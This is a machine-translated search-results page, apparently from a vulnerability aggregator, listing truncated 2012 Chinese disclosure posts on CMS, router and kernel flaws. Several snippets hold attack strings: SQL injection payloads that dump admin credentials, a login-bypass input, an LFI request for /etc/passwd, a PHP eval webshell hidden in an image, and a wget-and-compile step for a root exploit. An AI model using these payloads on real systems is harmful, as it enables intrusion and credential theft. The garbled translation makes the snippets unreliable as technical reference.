Lucene search

7620 matches found

myhack58
added 2012/03/08 12:0 a.m., 28 views

JEECMS the background of any file editing vulnerability and get a shell-vulnerability warning-the black bar safety net

JEECMS is developed in Java and inherits its advantages: robust, stable, secure, efficient, cross-platform and many others. It uses the mainstream SpringMVC3+Spring3+Hibernate3+Freemarker technical architecture, and its security is extremely strict; when the site after the installatio...

AI score: 1
Exploits: 0

myhack58
added 2012/03/08 12:0 a.m., 12 views

Unfamiliar street plaintext submit the registration information of the plaintext transmission-vulnerability warning-the black bar safety net

Unfamiliar Street is a location-based mobile social product launched by Beijing Unfamiliar Street Technology Co., Ltd. Its login authentication sends the user ID and password in cleartext. Detailed description: Unfamiliar Street is Beijing, unfamiliar street Technology Co., Ltd. launched a...

AI score: 1.6
Exploits: 0

myhack58
added 2012/03/08 12:0 a.m., 64 views

Linux 2.6.39 to 3.2.0 privilege escalation vulnerability-vulnerability warning-the black bar safety net

Download the exploit file wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c 2. Compile gcc mempodipper. c-o mempodipper 3. Before executing the view netcat@netcat:$ uname-r 3.0.0-1 2-generic netcat@netcat:$ cat /etc/issue Ubuntu 11.10 n l netcat@netcat:$ uname-a Linux netcat 3.0.0-1...

CVSS: 6.9
AI score: 6.6
EPSS: 0.10904
Exploits: 11

myhack58
added 2012/03/08 12:0 a.m., 40 views

WordPress EditorMonkey (FCKeditor)remote file upload vulnerability-vulnerability warning-the black bar safety net

EditorMonkey is a WordPress plugin. The FCKeditor editor in EditorMonkey has a remote file upload vulnerability that an attacker can exploit directly to obtain a webshell. +info: WordPress EditorMonkey FCKeditor Remote File Upload Author : kaMtiEz...

AI score: 7.2
Exploits: 0

myhack58
added 2012/03/06 12:0 a.m., 24 views

An anti-injection of a noob error-thousand Bo enterprise program-vulnerability warning-the black bar safety net

Thousand Bo enterprise Station program, anti-injected into the statement where there is a little error! Detail: If EnableStopInjection = True Then If Request. QueryString "" Then Call StopInjectionRequest. QueryString If Request. Cookies "" Then Call StopInjectionRequest. Cookies If Request...

AI score: 7.5
Exploits: 0

myhack58
added 2012/03/06 12:0 a.m., 30 views

An enterprise system is the presence of injection and solution-vulnerability warning-the black bar safety net

Brief description: An enterprise system's infocont.asp file has an injection vulnerability; the whole site does not filter special characters! Pro! Detailed description: A business website system's infocont.asp file has an injection. See the following code %@LANGUAGE="VBSCRIPT" CODEPAGE="936"%...

AI score: 1.6
Exploits: 0

myhack58
added 2012/03/04 12:0 a.m., 14 views

Network fun shopping system flagship version of eshop backend get webshell-vulnerability warning-the black bar safety net

Disclosure status: 2012-03-04: actively contacting the vendor and waiting for the vendor to claim it; details not open to the public. 2012-03-04: the vendor actively ignored the vulnerability; details disclosed to the public. Brief description: the eWebEditor editor's filtering is not strict, direct uploa...

AI score: 7.4
Exploits: 0

myhack58
added 2012/03/04 12:0 a.m., 12 views

Enterprise into the Electric Company enterprise website management system v1. 0(English version)vulnerability-vulnerability warning-the black bar safety net

File: Company. asp % ID=trimrequest. QueryString"id" if ID="" then ID=1 set Rs = server. createobject"adodb. recordset" Rs. source = "select from Company where ID="&ID&"" Rs. open Rs. source,conn,1,3 if Rs. eof then Content="also did not add relevant content!" else Kig=Rs"Kig" Rs"kig"=Kig+1 Rs...

AI score: 1.9
Exploits: 0

myhack58
added 2012/03/04 12:0 a.m., 24 views

Netease blog The permission check is not strict cause blog in the encrypted log and the draft disclosure-vulnerability warning-the black bar safety net

Brief description: the vulnerability can leak users' encrypted blog posts (friends-only, private) and post drafts. Detailed description: The AJAX request interface of the Netease blog post module passes the user level (visitor, friend, blogger) via a URL parameter, and not the...

AI score: 7
Exploits: 0

myhack58
added 2012/03/04 12:0 a.m., 16 views

Search for a cms with php through the kill-vulnerability warning-the black bar safety net

Author: z2681 From: 90sec Vulnerability files to the admin directory adminloginstate.php Look at the code ifempty$COOKIE'SAdminID' echo "scriptwindow. location='adminlogin.php'/script"; exit; elseif$COOKIE'SLogin'!= md5$COOKIE'SAdminID'.$ COOKIE'SAdminUserName'.$ COOKIE'SAdminPassWord'.$...

AI score: 1
Exploits: 0

myhack58
added 2012/03/04 12:0 a.m., 10 views

shypostShyPost enterprise website management system a number of vulnerabilities-vulnerability warning-the black bar safety net

ShyPost enterprise management system with dozens of templates, the user can freely choose a different template background management functions is the same, the following is one of the templates before and after the test, welcome to the user testing. Background demo:...

Exploits: 0

myhack58
added 2012/03/03 12:0 a.m., 99 views

phpcms-exp 0day-vulnerability warning-the black bar safety net

Reprinted from dis9.com ---------------------- ? php errorreportingEERROR; settimelimit0; $keyword=’inurl:about/joinus’ ; // batch keywords $timeout = 1; $stratpage = 1; $lastpage = 1 0 0 0 0 0 0 0; for $i=$stratpage ; $i=$lastpage ; $i++ $array=ReadBaiduList$keyword,$timeout,$i; foreach $array a...

AI score: 7.2
Exploits: 0

myhack58
added 2012/03/02 12:0 a.m., 14 views

Debian ‘x11-common’ Init script insecure temporary file creation vulnerability-vulnerability warning-the black bar safety net

Vulnerability cause: design error. Danger level: low. Affected systems: Debian x11-common 1:7.5+8. Unaffected systems: Hazards: A local attacker could exploit the vulnerability to elevate privileges or damage the system. Attack prerequisites: The attacker must have acces...

AI score: 1.4
Exploits: 0

myhack58
added 2012/03/02 12:0 a.m., 14 views

Yealink VOIP Phone persistent cross-site scripting flaws and fixes-vulnerability warning-the black bar safety net

Title: Yealink VOIP Phone Persistent Cross Site Scripting Vulnerability Product: Yealink Easy VOIP Phone Development website: http://www.yealink.com/ Author: Narendra Shinde =================================================== Developer description: --------------------------- Yealink is the...

AI score: 7.5
Exploits: 0

myhack58
added 2012/03/02 12:0 a.m., 13 views

Topics Viewer CSRF add admin-vulnerability warning-the black bar safety net

Title: Topics viewer CSRF Add Admin Author: The Green Hornet www.badguest.cn [email protected] Software download address: http://www.traidnt.net/Portal/Sites/Scripts/topics-viewer-v2.0-beta-1-traidnt.net.html Affected version:2.0 BETA 1 +++++++++++++++++++++++ html body...

AI score: 0.1
Exploits: 0

myhack58
added 2012/03/01 12:0 a.m., 13 views

ContaoCMS (aka TYPOlight) <= 2.11 CSRF (delete admin/delete articles)-vulnerability warning-the black bar safety net

Title: ContaoCMS aka TYPOlight <= 2.11 CSRF Delete Admin - Delete Article Author: Ivano Binetti http://ivanobinetti.com Download address: http://www.contao.org/en/download.html Developer website: http://www.contao.org Affected versions: 2.11.0 (latest) and earlier Test platform: Debian...

AI score: 7.1
Exploits: 0

myhack58
added 2012/03/01 12:0 a.m., 9 views

Document vulnerability ShellCode look-vulnerability warning-the black bar safety net

Inscription: still very much like to put this topic, put so long, also modified several versions, are not satisfied, today was pushed again to write, as much as possible to put themselves know something write it out, learn the need to constantly summary of to accumulate, on a Sunday ride out, see...

AI score: 0.1
Exploits: 0

myhack58
added 2012/02/26 12:0 a.m., 38 views

COCOON Counter statistical procedures vulnerability summary-vulnerability warning-the black bar safety net

A default database: counter/db/dbCCCounter6. mdb It can also be directly opened: http://www.badguest.cn /Counter/utilities/update. asp To view the source file, lookup! You can find the database address. Program problem. Second, the storm path vulnerability Use the probe http://www. xxx. com...

AI score: 7.1
Exploits: 0

myhack58
added 2012/02/26 12:0 a.m., 11 views

Dlink DCS series CSRF change the administrative password-vulnerability warning-the black bar safety net

Title: Dlink DCS series CSRF Change Admin Password Affected version: DCS-900, DCS-2000, DCS-5300 and possibly others. Author: rigan - [email protected] -- Description of the problem: Dlink DCS is a series of cameras. These cameras contain a CSRF flaw in the web interface. Thi...

AI score: 0.5
Exploits: 0

myhack58
added 2012/02/23 12:0 a.m., 29 views

php source code audit of the cookies spoofing-vulnerability warning-the black bar safety net

ebycms is a mobile music CMS. Straight to the code: in.php under the admin directory checks whether $AdminCookies is empty; if it is not empty, the login goes through. The value of $AdminCookies comes from the cookies adminname value. Modifying cookies bypasses authentication!!...

AI score: 1.3
Exploits: 0

myhack58
added 2012/02/21 12:0 a.m., 17 views

almnzm 2.4 <= CSRF flaws (add administrator)and fix-vulnerability warning-the black bar safety net

Developer: almnzm.com Author: HaNniBaL KsA HK [email protected] CSRF testadd a new administrator : centerbfont face="Tahoma" size="5" font color="FF0000"Priv8/font span dir="ltr"font color="FF0000"Almnzm 2.4/fontfont color="ffffff" /font/span CSRF Exploit!! /fontfont face="Tahoma" size="2"/fontfont...

AI score: 0.1
Exploits: 0

myhack58
added 2012/02/21 12:0 a.m., 11 views

DirCMS arbitrary file read 0day-vulnerability warning-the black bar safety net

Feel time really flies really fast, the computer opened an off day is gone. Can't go on like this, so I'm going to take some time to write the blog and learning, recording their growth. Whether it be a programmer, or a security engineer, reading someone else's code is undoubtedly progress in a...

AI score: 7.5
Exploits: 0

myhack58
added 2012/02/21 12:0 a.m., 21 views

D-Link DSL-2640B (ADSL Router) CSRF flaws and fixes-vulnerability warning-the black bar safety net

Title: D-Link DSL-2640B ADSL Router CSRF Vulnerability Author: Ivano Binetti www.badguest.cn http://ivanobinetti.com Program website: http://www.d-link.com Affected version: DSL-2640B Test platform: Firmware Version: EU4. 0 0; Hardware Version: B2 +-----------------------------------------------...

AI score: 0.1
Exploits: 0

myhack58
added 2012/02/21 12:0 a.m., 13 views

SyndeoCMS <= 3.0 CSRF flaws and fixes-vulnerability warning-the black bar safety net

Title: SyndeoCMS <= 3.0 CSRF Vulnerability Author: Ivano Binetti http://ivanobinetti.com Program development website: http://www.syndeocms.org/ Download address: http://sourceforge.net/projects/syndeocms Affected version: 3.0 and below Test System Platform: Debian Squeeze 6.0 +--------------+Add...

AI score: 0.1
Exploits: 0

myhack58
added 2012/02/20 12:0 a.m., 18 views

Mitra Iranian CMS remote file upload flaws and fixes-vulnerability warning-the black bar safety net

Title: Mitra Iranian CMS Remote File Upload Author: BHG Security Center Nitrojen90 Development website: http://www.nationalcms.ir/ Affected version: the full series Danger level: High Test System Platform: Windows Test example: http://www.badguest.cn...

AI score: 1.5
Exploits: 0

myhack58
added 2012/02/20 12:0 a.m., 20 views

4PSA CMS SQl injection flaws and fixes-vulnerability warning-the black bar safety net

Title: 4PSA CMS SQL Injection Vulnerabilities Author: BHG Security Center www.2cto.com Nitrojen90 Development program official website: http://www.4psa.com/ Affected version: latest version Risk level: high Testing platform: GNU/Linux - Windows Example: http://www.badguest.cn /print. php? id=SQL...

AI score: 1
Exploits: 0

myhack58
added 2012/02/17 12:0 a.m., 13 views

Fork CMS v3.2.4 multiple defects (LFI - XSS)-vulnerability warning-the black bar safety net

Title: Fork CMS v3.2.4 - Multiple Vulnerabilities Developers: http://www.fork-cms.com Author: RandomStorm - http://www.randomstorm.com Avram Marius Gabriel d3v1l Test platform: Windows XP & Vista Reflected cross-site scripting (XSS) in the management panel Test: http://www.badguest.cn...

AI score: 7.2
Exploits: 0

myhack58
added 2012/02/17 12:0 a.m., 19 views

kuwebs cool the weft enterprise website management system to discover the source code of built-in Backdoor-vulnerability warning-the black bar safety net

Disclosure status: 2012-02-17: actively contacting the vendor and waiting for the vendor to claim it; details not open to the public. 2012-02-17: the vendor actively ignored the vulnerability; details disclosed to the public. Brief description: The source code in the presence of a get back the...

AI score: 0.6
Exploits: 0

myhack58
added 2012/02/17 12:0 a.m., 7 views

BuyWebArt <<< SQL injection and fix-vulnerability warning-the black bar safety net

Author: Infamous Test example http://www.badguest.cn /path/xxxx. php? id=xxx&id=Sqli Examples http://www.badguest.cn/page.php?id=german http://www.badguest.cn/article.php?aid=3649&sid=1 9 http://www.badguest.cn/send-gift-cards.php?id=8...

Exploits: 0

myhack58
added 2012/02/15 12:0 a.m., 37 views

mysql injecting sleep statements caused denial of service and repair programme-vulnerability warning-the black bar safety net

When a MySQL injection exists and a sleep statement is injected with a large enough parameter, for example: sleep9 9 9 9 9 9 9 9 9 9. If the database uses the MyISAM engine and the injection point is in a statement that locks the table (insert, replace, update, delete), then the entire data...

AI score: 0.4
Exploits: 0

myhack58
added 2012/02/14 12:0 a.m., 16 views

Ananta Gazelle CMS upload statement for registration and fix-vulnerability warning-the black bar safety net

The head of the table: Ananta Gazelle CMS - Update Statement Sql injection Author: hackme Download address: http://sourceforge.net/projects/ananta/files/stable/Gazelle 1.0 stable/AnantaGazelle1.0.zip/ Impact version: 1.0 stable Test platform: backbox 2.1 First for my bad English, sorry + This...

AI score: 0.8
Exploits: 0

myhack58
added 2012/02/14 12:0 a.m., 13 views

aspcms background files without authentication injection+ cookie spoofing-vulnerability warning-the black bar safety net

Brief Description: The backend file AspCmsAboutEdit.asp performs no validation and no filtering, resulting in SQL injection. And pure cookie spoofing! Detailed description:-------- background injection-------- http://www.2cto.com /admin/content/About/AspCmsAboutEdit. asp? id=1%20and%2 0...

AI score: 1
Exploits: 0

myhack58
added 2012/02/14 12:0 a.m., 25 views

Cyberoam Central Console v2.00.2 file inclusion and fixes-vulnerability warning-the black bar safety net

Title: Cyberoam Central Console v2.00.2 - File Include Vulnerability Overview: Cyberoam Central Console CCC appliances offer the flexibility of hardware CCC appliances and virtual CCC appliances to provide centralized security management across distributed Cyberoam UTM appliances, enabling high...

AI score: 0.5
Exploits: 0

myhack58
added 2012/02/13 12:0 a.m., 18 views

ThinkSAAS upload File Vulnerabilities-vulnerability warning-the black bar safety net

Author: Insight-D. Software Link: http://www.thinksaas.cn Programs that use uploadify 2.1.4 have this problem. A lot of CMSes use this uploadify.php; many programmers call the swf file directly and ignore uploadify.php, which leads to security problems. Download:...

AI score: 7.3
Exploits: 0

myhack58
added 2012/02/13 12:0 a.m., 16 views

ECShop v2. 7. 2 wap page storm path 0day-vulnerability warning-the black bar safety net

Google: inurl:mobile/goods. php? act=viewimg&id=1 2 3 Search to After in page plus&id=5 That is, http://www. badguest. cn/mobile/goods. php? act=viewimg&id=1 2 3&id=5 For example, for many forums, submitted a non-existent file request, or submit a There is no output file of the request, the serve...

AI score: 6.9
Exploits: 0

myhack58
added 2012/02/13 12:0 a.m., 10 views

Hearing the odd tourist site system injection vulnerability-vulnerability warning-the black bar safety net

The entire system is the injection of! Such as: JingdianShow. asp NewsShow. asp These files contain UU. Lable. All. asp Code: Function UULableJingdianSstrList Set rs = Server. CreateObject"adodb. recordset" sql = "select from UUJingdian where Jingdianid=" Jingdianid&" " rs. Open sql, Conn, 1, 1 I...

AI score: 1.2
Exploits: 0

myhack58
added 2012/02/13 12:0 a.m., 58 views

Tencent microblogging XSS attack vulnerability-vulnerability warning-the black bar safety net

from: author:Kingthy's I believe we all know about the XSS attack incident on Sina Weibo on June 28? That night, a large number of Sina Weibo users automatically sent posts and automatically followed a user called "hellosamy". Why exactly can XSS attacks have so much power? Now many...

AI score: 7.1
Exploits: 0

myhack58
added 2012/02/11 12:0 a.m., 26 views

PHP local file inclusion(LFI)exploit-vulnerability warning-the black bar safety net

This study main references are: http://downloads.ackack.net/LocalFileInclusion.pdf Experimental code: If you are on linux, be submitted directly to: test. php? for=/etc/passwd%0 0 to display the file. ? php include$GET'for'.‘. php’;//for testing local include vulnerability ?& gt; If it is on win,...

AI score: 7.5
Exploits: 0

myhack58
added 2012/02/10 12:0 a.m., 23 views

Android webkit XSS cross-domain Auto-Download vulnerability-vulnerability warning-the black bar safety net

Android Multiple Vulnerabilities Author: www.80vul.com Email:5up3rh3igmail.com Release Date: 2012/2/8 References: http://www.80vul.com/android/android-0days.txt Ph4nt0m Webzine 0x06 has been released http://www.80vul.com/webzine0x06/, there three papers on the android application security about the...

AI score: 0.2
Exploits: 0

myhack58
added 2012/02/09 12:0 a.m., 17 views

Postal savings banks the UKEY useless-vulnerability warning-the black bar safety net

Today to the postal Savings Bank postal savings bank of china to go to the opening of the postal green card through the online banking, in order to safeguard the Bank account of the funding security, the requirements for online banking opened UKEY protection, the Bank staff attitude good, and...

AI score: 7.4
Exploits: 0

myhack58
added 2012/02/09 12:0 a.m., 11 views

oykX blog background post injection 0day-vulnerability warning-the black bar safety net

In the black bar safety net search oykX turned out to confiscate recorded this 0day Into http://zhouxiang. psdzj. com/admin/index. aspx In the account input box at the fill 1 2 3'Or 1=1 and '1'='1 Password is blank, also can be messy to fill, and click on the Login prompt for password error The...

AI score: 0.1
Exploits: 0

myhack58
added 2012/02/09 12:0 a.m., 14 views

nginx fastcgi configuration mistakes+parsing vulnerability-induced vulnerability-vulnerability warning-the black bar safety net

Many sites now run nginx. Since the nginx parsing vulnerability of N months ago, almost all of them have been fixed. The usual fix is written like this: if $fastcgiscriptname ../. php return 403; It returns 403 when /.php is matched. However, some fastcgi configurations handle more than just .php, and some are even...

AI score: 1.3
Exploits: 0

myhack58
added 2012/02/08 12:0 a.m., 13 views

LASERnet CMS Version 1.5 SQL injection vulnerability and fix-vulnerability warning-the black bar safety net

Use method: http://www.badguest.cn/index.php?id=SQL Demo: http://www.badguest.cn /index. php? id=-1' UNION SELECT 1,2,3,CONCATWSCHAR32,58,32,user,database,version,5,6,7,8,9,1 0,1 1,1 2,1 3--+ Provide solution The filter index. php page id=parameter input...

AI score: 1.3
Exploits: 0

myhack58
added 2012/02/07 12:0 a.m., 25 views

DNS domain transfer disclosure vulnerability details-vulnerability warning-the black bar safety net

A zone transfer is the operation in which a backup server refreshes its zone database with data from the primary server. This gives a running DNS service a certain degree of redundancy; its purpose is to prevent the primary domain name server from becoming unavailable due to an unexpected fault...

AI score: 6.8
Exploits: 0

myhack58
added 2012/02/05 12:0 a.m., 53 views

IIS7. 0 website, the exploit and the Fix-vulnerability warning-the black bar safety net

To the currently popular PHP as an example: To merge a PHP word pictures of horses, the combined method: ① , DOS merge: copy 1.gif /b + 1. txt/a php.gif ② , With edjpgcom, make picture and word Trojan of the merger, remark Code of? php eval$POSTmeckun;?& gt; Pictures just to find one...

AI score: 0.8
Exploits: 0

myhack58
added 2012/02/05 12:0 a.m., 24 views

Southern data editor(southidceditor)injection 0day vulnerabilities-vulnerability warning-the black bar safety net

Injection point:newssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 It may beanother versionnewssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9,1 0 from admin where 1...

AI score: 7.8
Exploits: 0

myhack58
added 2012/02/05 12:0 a.m., 8 views

PHP also has a major vulnerability multi-language denial of service vulnerability in the event of early warning-vulnerability warning-the black bar safety net

Security monitoring has found that hackers have discovered a serious security vulnerability in the current PHP 5.3.9; a remote attacker could directly exploit this vulnerability to execute arbitrary PHP code. The security risk is very high. After follow-up, the vulnerability, the CVE-2012-0830 i...

AI score: 2.8
Exploits: 0

myhack58
added 2012/01/30 12:0 a.m., 11 views

oday or exp mining techniques overview-vulnerability warning-the black bar safety net

A lot of times we on various 0day or exp with strong passion, indeed, the hand grip of such powerful weapons of destruction will make the target's combat becomes very smooth, but the problem is that not everyone can grasp the latest 0day, and to be clear that there is a lot we do not know the 0da...

AI score: 8
Exploits: 0

myhack58
added 2012/01/30 12:0 a.m., 13 views

Notepad Dog microblogging 3. 0 0day-vulnerability warning-the black bar safety net

You know.... wap/index. php? mod=pm&pmnew=andselect%2 0 1%20fromselect%20count,concatselect%2 0select%2 0select%20concat0x27,0x7e,jishigoumembers. username,0x27,0x7e,jishigoumembers. password,0x27,0x7e%20from%20jishigoumembers%20where%20uid=1%20limit%200,1%20from%20informationschema...

AI score: 2
Exploits: 0

myhack58
added 2012/01/30 12:0 a.m., 24 views

A lot of the rebate Taobao guest program Duoduo v7. 3 injection vulnerability-vulnerability warning-the black bar safety net

Vulnerability details. Disclosure status: 2012-01-29: actively contacting the vendor and waiting for the vendor to claim it; details not open to the public. 2012-01-29: the vendor actively ignored the vulnerability; details disclosed to the public. Brief description:...

AI score: 0.8
Exploits: 0

Total number of security vulnerabilities: 7620